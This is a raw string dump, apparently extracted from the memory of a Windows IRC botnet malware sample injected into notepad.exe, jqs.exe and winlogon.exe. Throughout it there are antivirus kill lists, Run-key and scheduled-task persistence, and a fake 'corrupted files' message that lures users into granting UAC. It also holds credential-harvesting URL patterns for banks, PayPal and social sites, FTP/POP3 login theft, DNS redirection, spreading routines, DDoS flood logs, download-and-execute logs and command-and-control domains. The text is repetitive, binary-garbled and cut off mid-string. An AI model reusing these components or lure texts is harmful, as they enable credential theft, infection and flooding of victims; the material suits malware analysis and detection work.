CRT more than once.- CRT not initialized- floating point support not loadedGetProcessWindowStationUSER32.DLLShellExecuteASHELL32.dllGetCPInfoGetWindowsDirectoryACreatePipeGetWindowsDirectoryWGetConsoleOutputCPKERNEL32.dll.VI3xqrzcÁUdp?iw0/#"%fP.oUwB%Su[Rkka.by.dYi'p.Cvq.EU{%D ;0.Bx%s)$Oi.zC:*@7WeBld0%Fr. -.kN.kal"f.xKKSoftware\Classes\CLSID\%SG:%S_0xXchrome.exeopera.exesafari.exemaxthon.exe:Mozilla\Firefox\Profilescookies.sqlite%s\winsxs\x86_microsoft.windows.common-controls_*6.0.*_*%s\winsxs\%s\comctl32.dllSYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\%s%s:*:Enabledavcuf32.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Runprstrui.exeWindows DefenderMpClient.dllWindows Defender\MSASCui.exeMpSvc.dllmsseces.exeMsMpEng.exeMSASCui.exeMpAsDesc.dllMsMpLics.dllavgui.exeavgidsagent.exeavgwdsvc.exeavgdiagex.exeavgmfapx.exeavgupd.exeavgcfgex.exeavgnt.exeavguard.exeavshadow.exeavcenter.exeupdate.dllupdaterc.dllusrreq.execcsvchst.exesymerr.exeNIS.exeNAV.exenavw32.exeavastui.exeAvastEmUpdate.exeashUpd.exeWRSA.exezatray.exeForceField.exeupdating.dllfshoster32.exefsaua.dllPSUNMain.exePSUAService.exePSANHost.exePSUNScan.dllepavjobs.exeAVENGINE.exeUpgrader.exeadaware.exeBullGuard.exe.manifestBullGuardUpdate.exeBullGuard.exeBullGuardScanner.exeBullGuardBhvScanner.exeBullGuardUpdate2.exeBgScan.exeBgScanEngine.dll.manifestupdater.exeBackup\RSD\RSSetup\updater.exeRsTray.exeRavMonD.exeRsMgrSvc.exersmain.exeRsScan.dllRsTray.dllmbamgui.exembam.exepctsGui.exepctsAuxs.exepctsSvc.exeUpdate.exeUpdateHlpr.dllDefinitions\vcore.dllsbamui.exeSBAMTray.exeupdater_client_mod.dllFProtTray.exeFPWin.exescf.datALUpdate.exeupdate_tmp.exearcaclean.exeBavUpdater.exercfp.exeCLPSLA.exeop_mon.exeniu.exeK7TSUpdT.exesguardxup.execcupdate.execaupdate.dlla2guard.exea2start.exea2service.exeAVKTray.exeGDSC.exeAVK.exeGDFirewallTray.exeBka.exeBLuPro.exeBkavSystemServer.exeBkavService.exeLiveUpdate.dllLiveConnect.dllBaseFile\Bkav\LiveUpdate.dllV3Lite.exeASDSvc.exeautoup.exedownloader.exe%s.configupdatesrv.exeupdatemgr.dllegui.exeekrn.exex86\ekrn.exeuWinMgr.execoreServiceShell.exeuiSeAgnt.exeuiWatchDog.exeplugins\plugUpdater.dllUiFrmwrk\uiUpdateTray.execoreFrameworkHost.exemcagent.exeMcSvHost.exeMcUICnt.exeMcPvTray.exemcui_exemcpltui_exemcshell.exemcupdmgr.exemcupdate.exemcshield.exemcupdui.dllMcAPExe.exe.configImage File Execution Options\%sSYSTEM\CurrentControlSet\services\%s%c:\ntusbdriver.sys%c:\*p.exe%c:\%sp.exe%WinDir%\explorer.exe/C start /d. %s&"%s"%COMSPEC%%WinDir%\system32\shell32.dll%c:\%s.lnkVisthAux.exeexplorer.exet.minecraftWorks! PID: %d, Name: %scmdvirth%s%s\Xtcp://svchost.execsrss.exelsass.exesmss.exewscript.execscript.exevbc.exerundll32.exeregsvr32.exeSOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Runwinlogon.exeservices.exe%s\x.lnkSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%sdesktop.iniSOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceSOFTWARE\Microsoft\Windows NT\CurrentVersion\Windowswintrust.dllchrome.dllApplications\iexplore.exe\shell\open\command%s_xxx.zipNavw32.exeSysInspector.exeavscan.exemfefire.exewuauclt.exeWerFault.exelFileZilla\sitemanager.xmlportSites.datQuick.dat%s\3\%s%s\4\%sspoolsv.exesteam.exeskype.exeorigin.exedwm.exetapi3.dll/C copy "%s" "%s"SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunWindows Update Service"%s" /%sSoftware\Microsoft\Windows\CurrentVersion\RunOnce/CREATE /SC ONLOGON /TN "Windows Update Check - 0xX" /TR "%s" /RL HIGHESTschtasks.exe/DELETE /TN "Windows Update Check - 0xX" /F\Windows\Explorer.exeLow_X%s.manifestPendingFileRenameOperations%s\XWindows\CurrentVersion\RunCurrentVersion\WindowsWindows NT\CurrentVersion\Image File Execution Options\%sWindows has encountered a corrupted folder on your hard driveMultiple corrupted files have been found in the folder 'My Documents'. To prevent serious loss of data, please allow Windows to restore these files.Corrupted folder: %sCorrupted file count: %d%s/c start "" "%s" /%s "%s"shell32,ShellExec_RunDLL "%s" /%s "%s"You denied the proper privileges to the Windows file restoration utility. Please select YES on the following UAC prompt to allow Windows to restore the corrupted files.Windows 3.1 Update Service%s:Zone.Identifier%s\X.pifKERNEL32.DLLKERNELBASE.DLLkernelbase.dlloSome operation could not be performed because the system is out of resources. Close some windows and try again.Setting bit transparency color is not allowed for png images containing alpha value for each pixel (COLOR_RGBALPHA and COLOR_GRAYSCALEALPHA)OThis operation is not valid because the current image contains no valid header.4The new size provided for image resizing is invalid.oThe "Portable Network Graphics" could not be created because invalid image type parameters have being provided.2Software\Microsoft\Windows\CurrentVersion\ExplorerUThis "Portable Network Graphics" image is invalid because it has missing image parts.[Could not decompress the image because it contains invalid compressed data.Description: BThe "Portable Network Graphics" image contains an invalid palette.The file being read is not a valid "Portable Network Graphics" image because it contains an invalid header. This file may be corrupted, try obtaining it againnThis "Portable Network Graphics" image is not supported or it might be invalid.This "Portable Network Graphics" image is not supported because either its width or height exceeds the maximum size of 65535 pixels.There is no such palette entry.dThis "Portable Network Graphics" image contains an unknown critical part which could not be decoded.pThis "Portable Network Graphics" image is encoded with an unknown compression scheme which could not be decoded.cThis "Portable Network Graphics" image uses an unknown interlace scheme which could not be decoded.-The chunks must be compatible to be assigned.jThis "Portable Network Graphics" image is invalid because the decoder found an unexpected end of the file.8This "Portable Network Graphics" image contains no data.]The program tried to add a existent critical chunk to the current image which is not allowed.IIt's not allowed to add a new chunk because the current image is invalid.7The png image could not be loaded from the resource ID.)Class '%s' is already registered for '%s'%Class '%s' is not registered for '%s'%s parameter cannot be nil#Feature not supported by this styleStyle '%s' is not registered"Cannot unregister the system styleOLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parametersFailed to Save StreamjThis "Portable Network Graphics" image is not valid because it contains invalid pieces of data (crc error)yThe "Portable Network Graphics" image could not be loaded because one of its main piece of data (ihdr) might be corruptedLogin"%s" is an invalid pathÊnnot remove shell notification icon"%s requires Windows Vista or laterButton%dRadioButton%dUnable to load style '%s'Unable to load styles: %sStyle '%s' already registered#Style class '%s' already registeredStyle '%s' not foundStyle class '%s' not foundAll Clipboard does not support IconsCannot open clipboard: %sText exceeds memo capacity Operation not supported on selected printer.There is no default printer currently selected/Menu '%s' is already being used by another form- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.7Length of value array must be >= length of prompt array&PasswordValue must be between %d and %d%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex5Cannot create form. No MDI forms are currently active0Can only modify an image if it contains a bitmap*A control cannot have itself as its parentError creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'%s property out of rangeGNo single cast observer with ID %d was added to the observer collectionFNo multi cast observer with ID %d was added to the observer collectionScan line index out of range!Cannot change the size of an iconÊnnot change the size of a WIC Image$Unknown picture file extension (.%s)Unsupported clipboard formatCanvas does not allow drawing#Text format flag '%s' not supportedWindows Server 2003Windows Server 2003 R2Windows Server 2012Windows 8Error writing zip file"Invalid Zip Local Header signature$Invalid Zip Central Header signature1Support for compression method not registered: %sObserver is not supportedLCannot have multiple single cast observers added to the observers collection4The object does not implement the observer interface5Insufficient RTTI available to support this operationParameter count mismatch WindowsWindows VistaWindows Server 2008Windows 7Windows Server 2008 R2Windows 2000Windows XPTimespan too longbThe duration cannot be returned because the absolute value exceeds the value of TTimeSpan.MaxValueNo help found for context %dNo help found for %sParameter %s cannot be nil'Parameter %s cannot be a negative value*Input buffer exceeded for %s = %d, %s = %dThe specified path is too long The specified path was not found The path format is not supportedThe drive cannot be found The specified file was not foundWThe given "%s" local time is invalid (situated within the missing period prior to DST).$No help viewer that supports filtersInvalid Timeout value: %sFailed to create key %sFailed to get data for '%s'Failed to set data for '%s'Resource %s not found%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration groupProperty %s does not existThread creation error: %sThread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread2Cannot call Start on a running or suspended thread;Cannot call CheckTerminated on an externally created threadUnable to write to %sInvalid file name - %s'%s' is an invalid mask at (%d)$''%s'' is not a valid component nameInvalid data type for '%s' List capacity out of bounds (%d)List count out of bounds (%d)List index out of bounds (%d) Out of memory while expanding memory stream)%s has not been registered as a COM classError reading %s%s%s: %sInvalid count (%d)Invalid destination index (%d)Ancestor for '%s' not foundCannot assign a %s to a %sBits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main threadClass %s not foundA class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicatesCannot create file "%s". %sCannot open file "%s". %sInvalid destination array"Character index out of bounds (%d)Start index out of bounds (%d)%s (%s, line %d)Abstract Error?Access violation at address %p in module '%s'. %s of address %pSystem Error. Code: %d.2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)Operation not supportedExternal exception %xInterface not supportedObject lock not owned(Monitor support function not initializedApplication Error1Format '%s' invalid or incompatible with argumentNo argument for format '%s'"Variant method calls not supportedInvalid variant operationInvalid NULL variant operation%Invalid variant operation (%s%.8x)%s,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usableInteger overflow Invalid floating point operationInvalid pointer operationInvalid class typecast0Access violation at address %p. %s of address %pPrivileged instruction(Exception %s in module %s at %p.!'%s' is not a valid integer value('%s' is not a valid floating point value '%s' is not a valid date'%s' is not a valid time!'%s' is not a valid date and time '%d.%d' is not a valid timestamp'%s' is not a valid GUID valueI/O error %dnotepad.exe_1520_rwx_00950000_0004E000:
.text`.rdata@.data.reloc=MSG t>MSG u`=PASS8httpu18httpuMtlSSSSSSSSSShL0%s.%s%s.%S%s.Blocked "%s" from removing our bot file!%s.Blocked "%S" from removing our bot file!i.root-servers.org%s.Blocked "%s" from moving our bot file%s.Blocked "%S" from moving our bot file%s.p10-> Message hijacked!%s.p10-> Message to %s hijacked!%s.p21-> Message hijacked!msnmsgCAL %d %6sngr->blocksize: %dblock_size: %d\\.\pipe\%skernel32.dll%s_%d-%sMutexntdll.dll%s-pid%s-commJOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %5sJOIN %5sPRIVMSGJOIN%s:%d%s.%s%s%S%s%s%s.%S%S%S%S%Sstate_%s%s.%s (p='%S')pop3://%s:%s@%s:%d%s:%s@%s:%dftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %s%s-%s-%s%s.Blocked possible browser exploit pack call on URL '%s'%s.Blocked possible browser exploit pack call on URL '%S'webroot.virusbuster.nprotect.heck.tconecare.live.login[password]login[username]*members*.iknowthatgirl*/members**youporn.*/login**members.brazzers.com**bcointernacional*login**:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*loginid*enom.com/login*login.Passlogin.User*login.Pass=**1and1.com/xml/config**moniker.com/*Login*LoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*loginname*godaddy.com/login*Password*Password=**alertpay.com/login**netflix.com/*ogin**thepiratebay.org/login**torrentleech.org/*login**vip-file.com/*/signin-do**sms4file.com/*/signin-do**letitbit.net**what.cd/login**oron.com/login**filesonic.com/*login**speedyshare.com/login**uploaded.to/*login**uploading.com/*login*loginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login**hotfile.com/login**4shared.com/login*txtpass*txtpass=**netload.in/index**freakshare.com/login*login_pass*login_pass=**mediafire.com/*login**sendspace.com/login**megaupload.*/*login**depositfiles.*/*/login**signin.ebay*SignIn*officebanking.cl/*login.asp**secure.logmein.*/*logincheck*session[password]*password]=**twitter.com/sessionstxtPassword*&txtPassword=**.moneybookers.*/*login.pl*runescape*/*weblogin**&password=**no-ip*/login**steampowered*/login*quick_password*hackforums.*/member.php*facebook.*/login.php**login.yahoo.*/*login*passwdlogin*passwd=**login.live.*/*post.srf*TextfieldPassword*TextfieldPassword=**gmx.*/*FormLogin**Passwd=*FLN-Password*FLN-Password=**pass=**bigstring.*/*index.php**screenname.aol.*/login.psp*passwordloginId*password=**aol.*/*login.psp*Passwd*google.*/*ServiceLoginAuth*login_passwordlogin_email*login_password=**paypal.*/webscr?cmd=_login-submit*%s / ?%d HTTP/1.1Host: %sUser-Agent: %sMozilla/4.0\\.\PHYSICALDRIVE0shell32.dllhttpidnsapi.dllhttp://%s/%shttp://%s/POST /23s[%s{%s%s{%sn%s[%s{%s%s{%s%s[%s{%s[DNS]: Redirecting "%s" to "%s"%s|%s[Logins]: Cleared %d loginsFTP ->[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)http://[Login]: %s[DNS]: Blocked %d domain(s) - Redirected %d domain(s)[Speed]: Estimated upload speed %d KB/sSoftware\Microsoft\Windows\CurrentVersion\Run\\.\%c:*bebo.*/c/profile/comment_post.json*bebo.*/mail/MailCompose.jsp**friendster.*/sendmessage.php**friendster.*/rpc.php*vkontakte.ru/mail.php*vkontakte.ru/wall.php*vkontakte.ru/api.php*facebook.*/ajax/*MessageComposerEndpoint.php*msg_text*facebook.*/ajax/chat/send.php*-_.!~*'()%s.%s hijacked!MSG %d %s %dMSG %d %1sSDG %d %dContent-Length: %dSDG %d%s_0xXRegCreateKeyExWRegCreateKeyExAURLDownloadToFileWURLDownloadToFileAHttpSendRequestWHttpSendRequestANtEnumerateValueKeyDNSAPI.dllSecur32.dllShellExecuteASHELL32.dllHttpQueryInfoAInternetOpenUrlAHttpQueryInfoWWININET.dllSHLWAPI.dllWS2_32.dllMSVCRT.dllGetProcessHeapConnectNamedPipeCreateNamedPipeADisconnectNamedPipeGetWindowsDirectoryWGetWindowsDirectoryAKERNEL32.dllUSER32.dllRegCloseKeyRegNotifyChangeKeyValueRegOpenKeyExAADVAPI32.dllole32.dllm1xg.orgmxxtxxt.bizmeob.me]1.1.0.0msn.setmsn.inthttp.sethttp.inthttp.injloginsPASS %s[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}SSRR %s 0 0 :%sKCIK %sSEND %s %sPART %sPPPPMSG %s :%sQUIT :%sPPNG %sPPPPMSG[v="%s" c="%s" h="%s" p="%S"][d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d[Slowloris]: Starting flood on "%s" for %d minute(s)[Slowloris]: Finished flood on "%s"[UDP]: Starting flood on "%s:%d" for %d second(s)[UDP]: Finished flood on "%s:%d"[SYN]: Starting flood on "%s:%d" for %d second(s)[SYN]: Finished flood on "%s:%d"[USB]: Infected %s[MSN]: Updated MSN spread message to "%s"[MSN]: Updated MSN spread interval to "%s"[HTTP]: Updated HTTP spread message to "%s"[HTTP]: Injected value is now %s.[HTTP]: Updated HTTP spread interval to "%s"[Visit]: Visited "%s"[DNS]: Blocked "%s"[usb="%d" msn="%d" http="%d" total="%d"][ftp="%d" pop="%d" http="%d" total="%d"][RSOCK4]: Started rsock4 on "%s:%d"[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)[d="%s"] Error downloading file [e="%d"][d="%s"] Error writing download to "%S" [e="%d"][d="%s" s="%d bytes"] Error creating process "%S" [e="%d"][d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"][d="%s"] Error getting temporary filename. [e="%d"][d='%s"] Error getting application data path [e="%d"][Visit]: Error visitng "%s"[FTP Login]: %s[POP3 Login]: %s[FTP Infect]: %s was iframed[HTTP Login]: %s[HTTP Traffic]: %s[Ruskill]: Detected File: "%s"[Ruskill]: Detected DNS: "%s"[Ruskill]: Detected Reg: "%s"[PDef ]: %s[DNS]: Blocked DNS "%s"[MSN]: %s[HTTP]: %sftplogftpinfecthttploginhttptraffhttpspreadhttp://api.wipmania.com/\\.\pipe\x_ipc\\.\pipe\c1419a97%System%\notepad.exe%WinDir%%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe7 767<7~78*808;8~8%s\Identities\%s.exe\\.\pipeautorun.infpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exe.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exel"%s" %Slol.exen127.0.0.1%s:Zone.Identifierwininet.dllsecur32.dllws2_32.dll:%S%S\winlogon.exenotepad.exeAadvapi32.dllurlmon.dllnspr4.dllAkernel23.dlly%s\%s.exelsass.exeSoftware\Microsoft\Windows\CurrentVersion\Policies\System.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\Device\HarddiskVolume1\WINDOWS\system32\notepad.exeC:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exejqs.exe_348_rwx_010C0000_0004E000:
.text`.rdata@.data.reloc=MSG t>MSG u`=PASS8httpu18httpuMtlSSSSSSSSSShL0%s.%s%s.%S%s.Blocked "%s" from removing our bot file!%s.Blocked "%S" from removing our bot file!i.root-servers.org%s.Blocked "%s" from moving our bot file%s.Blocked "%S" from moving our bot file%s.p10-> Message hijacked!%s.p10-> Message to %s hijacked!%s.p21-> Message hijacked!msnmsgCAL %d %6sngr->blocksize: %dblock_size: %d\\.\pipe\%skernel32.dll%s_%d-%sMutexntdll.dll%s-pid%s-commJOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %5sJOIN %5sPRIVMSGJOIN%s:%d%s.%s%s%S%s%s%s.%S%S%S%S%Sstate_%s%s.%s (p='%S')pop3://%s:%s@%s:%d%s:%s@%s:%dftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %s%s-%s-%s%s.Blocked possible browser exploit pack call on URL '%s'%s.Blocked possible browser exploit pack call on URL '%S'webroot.virusbuster.nprotect.heck.tconecare.live.login[password]login[username]*members*.iknowthatgirl*/members**youporn.*/login**members.brazzers.com**bcointernacional*login**:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*loginid*enom.com/login*login.Passlogin.User*login.Pass=**1and1.com/xml/config**moniker.com/*Login*LoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*loginname*godaddy.com/login*Password*Password=**alertpay.com/login**netflix.com/*ogin**thepiratebay.org/login**torrentleech.org/*login**vip-file.com/*/signin-do**sms4file.com/*/signin-do**letitbit.net**what.cd/login**oron.com/login**filesonic.com/*login**speedyshare.com/login**uploaded.to/*login**uploading.com/*login*loginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login**hotfile.com/login**4shared.com/login*txtpass*txtpass=**netload.in/index**freakshare.com/login*login_pass*login_pass=**mediafire.com/*login**sendspace.com/login**megaupload.*/*login**depositfiles.*/*/login**signin.ebay*SignIn*officebanking.cl/*login.asp**secure.logmein.*/*logincheck*session[password]*password]=**twitter.com/sessionstxtPassword*&txtPassword=**.moneybookers.*/*login.pl*runescape*/*weblogin**&password=**no-ip*/login**steampowered*/login*quick_password*hackforums.*/member.php*facebook.*/login.php**login.yahoo.*/*login*passwdlogin*passwd=**login.live.*/*post.srf*TextfieldPassword*TextfieldPassword=**gmx.*/*FormLogin**Passwd=*FLN-Password*FLN-Password=**pass=**bigstring.*/*index.php**screenname.aol.*/login.psp*passwordloginId*password=**aol.*/*login.psp*Passwd*google.*/*ServiceLoginAuth*login_passwordlogin_email*login_password=**paypal.*/webscr?cmd=_login-submit*%s / ?%d HTTP/1.1Host: %sUser-Agent: %sMozilla/4.0\\.\PHYSICALDRIVE0shell32.dllhttpidnsapi.dllhttp://%s/%shttp://%s/POST /23s[%s{%s%s{%sn%s[%s{%s%s{%s%s[%s{%s[DNS]: Redirecting "%s" to "%s"%s|%s[Logins]: Cleared %d loginsFTP ->[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)http://[Login]: %s[DNS]: Blocked %d domain(s) - Redirected %d domain(s)[Speed]: Estimated upload speed %d KB/sSoftware\Microsoft\Windows\CurrentVersion\Run\\.\%c:*bebo.*/c/profile/comment_post.json*bebo.*/mail/MailCompose.jsp**friendster.*/sendmessage.php**friendster.*/rpc.php*vkontakte.ru/mail.php*vkontakte.ru/wall.php*vkontakte.ru/api.php*facebook.*/ajax/*MessageComposerEndpoint.php*msg_text*facebook.*/ajax/chat/send.php*-_.!~*'()%s.%s hijacked!MSG %d %s %dMSG %d %1sSDG %d %dContent-Length: %dSDG %d%s_0xXRegCreateKeyExWRegCreateKeyExAURLDownloadToFileWURLDownloadToFileAHttpSendRequestWHttpSendRequestANtEnumerateValueKeyDNSAPI.dllSecur32.dllShellExecuteASHELL32.dllHttpQueryInfoAInternetOpenUrlAHttpQueryInfoWWININET.dllSHLWAPI.dllWS2_32.dllMSVCRT.dllGetProcessHeapConnectNamedPipeCreateNamedPipeADisconnectNamedPipeGetWindowsDirectoryWGetWindowsDirectoryAKERNEL32.dllUSER32.dllRegCloseKeyRegNotifyChangeKeyValueRegOpenKeyExAADVAPI32.dllole32.dllm1xg.orgmxxtxxt.bizmeob.me]1.1.0.0msn.setmsn.inthttp.sethttp.inthttp.injloginsPASS %s[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}SSRR %s 0 0 :%sKCIK %sSEND %s %sPART %sPPPPMSG %s :%sQUIT :%sPPNG %sPPPPMSG[v="%s" c="%s" h="%s" p="%S"][d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d[Slowloris]: Starting flood on "%s" for %d minute(s)[Slowloris]: Finished flood on "%s"[UDP]: Starting flood on "%s:%d" for %d second(s)[UDP]: Finished flood on "%s:%d"[SYN]: Starting flood on "%s:%d" for %d second(s)[SYN]: Finished flood on "%s:%d"[USB]: Infected %s[MSN]: Updated MSN spread message to "%s"[MSN]: Updated MSN spread interval to "%s"[HTTP]: Updated HTTP spread message to "%s"[HTTP]: Injected value is now %s.[HTTP]: Updated HTTP spread interval to "%s"[Visit]: Visited "%s"[DNS]: Blocked "%s"[usb="%d" msn="%d" http="%d" total="%d"][ftp="%d" pop="%d" http="%d" total="%d"][RSOCK4]: Started rsock4 on "%s:%d"[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)[d="%s"] Error downloading file [e="%d"][d="%s"] Error writing download to "%S" [e="%d"][d="%s" s="%d bytes"] Error creating process "%S" [e="%d"][d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"][d="%s"] Error getting temporary filename. [e="%d"][d='%s"] Error getting application data path [e="%d"][Visit]: Error visitng "%s"[FTP Login]: %s[POP3 Login]: %s[FTP Infect]: %s was iframed[HTTP Login]: %s[HTTP Traffic]: %s[Ruskill]: Detected File: "%s"[Ruskill]: Detected DNS: "%s"[Ruskill]: Detected Reg: "%s"[PDef ]: %s[DNS]: Blocked DNS "%s"[MSN]: %s[HTTP]: %sftplogftpinfecthttploginhttptraffhttpspreadhttp://api.wipmania.com/\\.\pipe\x_ipc\\.\pipe\c1419a97%Program Files%\Java\jre6\bin\jqs.exe%WinDir%%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe7 767<7~78*808;8~8%s\Identities\%s.exe\\.\pipeautorun.infpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exe.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exel"%s" %Slol.exen127.0.0.1%s:Zone.Identifierwininet.dllsecur32.dllws2_32.dll:%S%S\winlogon.exenotepad.exeAadvapi32.dllurlmon.dllnspr4.dllAkernel23.dlly%s\%s.exelsass.exeSoftware\Microsoft\Windows\CurrentVersion\Policies\System.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\Device\HarddiskVolume1\Program Files\Java\jre6\bin\jqs.exeC:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exewinlogon.exe_708_rwx_014A0000_0004E000:
.text`.rdata@.data.reloc=MSG t>MSG u`=PASS8httpu18httpuMtlSSSSSSSSSShL0K%s.%s%s.%S%s.Blocked "%s" from removing our bot file!%s.Blocked "%S" from removing our bot file!i.root-servers.org%s.Blocked "%s" from moving our bot file%s.Blocked "%S" from moving our bot file%s.p10-> Message hijacked!%s.p10-> Message to %s hijacked!%s.p21-> Message hijacked!msnmsgCAL %d %6sngr->blocksize: %dblock_size: %d\\.\pipe\%skernel32.dll%s_%d-%sMutexntdll.dll%s-pid%s-commJOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %5sJOIN %5sPRIVMSGJOIN%s:%d%s.%s%s%S%s%s%s.%S%S%S%S%Sstate_%s%s.%s (p='%S')pop3://%s:%s@%s:%d%s:%s@%s:%dftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %s%s-%s-%s%s.Blocked possible browser exploit pack call on URL '%s'%s.Blocked possible browser exploit pack call on URL '%S'webroot.virusbuster.nprotect.heck.tconecare.live.login[password]login[username]*members*.iknowthatgirl*/members**youporn.*/login**members.brazzers.com**bcointernacional*login**:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*loginid*enom.com/login*login.Passlogin.User*login.Pass=**1and1.com/xml/config**moniker.com/*Login*LoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*loginname*godaddy.com/login*Password*Password=**alertpay.com/login**netflix.com/*ogin**thepiratebay.org/login**torrentleech.org/*login**vip-file.com/*/signin-do**sms4file.com/*/signin-do**letitbit.net**what.cd/login**oron.com/login**filesonic.com/*login**speedyshare.com/login**uploaded.to/*login**uploading.com/*login*loginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login**hotfile.com/login**4shared.com/login*txtpass*txtpass=**netload.in/index**freakshare.com/login*login_pass*login_pass=**mediafire.com/*login**sendspace.com/login**megaupload.*/*login**depositfiles.*/*/login**signin.ebay*SignIn*officebanking.cl/*login.asp**secure.logmein.*/*logincheck*session[password]*password]=**twitter.com/sessionstxtPassword*&txtPassword=**.moneybookers.*/*login.pl*runescape*/*weblogin**&password=**no-ip*/login**steampowered*/login*quick_password*hackforums.*/member.php*facebook.*/login.php**login.yahoo.*/*login*passwdlogin*passwd=**login.live.*/*post.srf*TextfieldPassword*TextfieldPassword=**gmx.*/*FormLogin**Passwd=*FLN-Password*FLN-Password=**pass=**bigstring.*/*index.php**screenname.aol.*/login.psp*passwordloginId*password=**aol.*/*login.psp*Passwd*google.*/*ServiceLoginAuth*login_passwordlogin_email*login_password=**paypal.*/webscr?cmd=_login-submit*%s / ?%d HTTP/1.1Host: %sUser-Agent: %sMozilla/4.0\\.\PHYSICALDRIVE0shell32.dllhttpidnsapi.dllhttp://%s/%shttp://%s/POST /23s[%s{%s%s{%sn%s[%s{%s%s{%s%s[%s{%s[DNS]: Redirecting "%s" to "%s"%s|%s[Logins]: Cleared %d loginsFTP ->[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)http://[Login]: %s[DNS]: Blocked %d domain(s) - Redirected %d domain(s)[Speed]: Estimated upload speed %d KB/sSoftware\Microsoft\Windows\CurrentVersion\Run\\.\%c:*bebo.*/c/profile/comment_post.json*bebo.*/mail/MailCompose.jsp**friendster.*/sendmessage.php**friendster.*/rpc.php*vkontakte.ru/mail.php*vkontakte.ru/wall.php*vkontakte.ru/api.php*facebook.*/ajax/*MessageComposerEndpoint.php*msg_text*facebook.*/ajax/chat/send.php*-_.!~*'()%s.%s hijacked!MSG %d %s %dMSG %d %1sSDG %d %dContent-Length: %dSDG %d%s_0xXRegCreateKeyExWRegCreateKeyExAURLDownloadToFileWURLDownloadToFileAHttpSendRequestWHttpSendRequestANtEnumerateValueKeyDNSAPI.dllSecur32.dllShellExecuteASHELL32.dllHttpQueryInfoAInternetOpenUrlAHttpQueryInfoWWININET.dllSHLWAPI.dllWS2_32.dllMSVCRT.dllGetProcessHeapConnectNamedPipeCreateNamedPipeADisconnectNamedPipeGetWindowsDirectoryWGetWindowsDirectoryAKERNEL32.dllUSER32.dllRegCloseKeyRegNotifyChangeKeyValueRegOpenKeyExAADVAPI32.dllole32.dllm1xg.orgmxxtxxt.bizmeob.me]1.1.0.0msn.setmsn.inthttp.sethttp.inthttp.injloginsPASS %s[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}SSRR %s 0 0 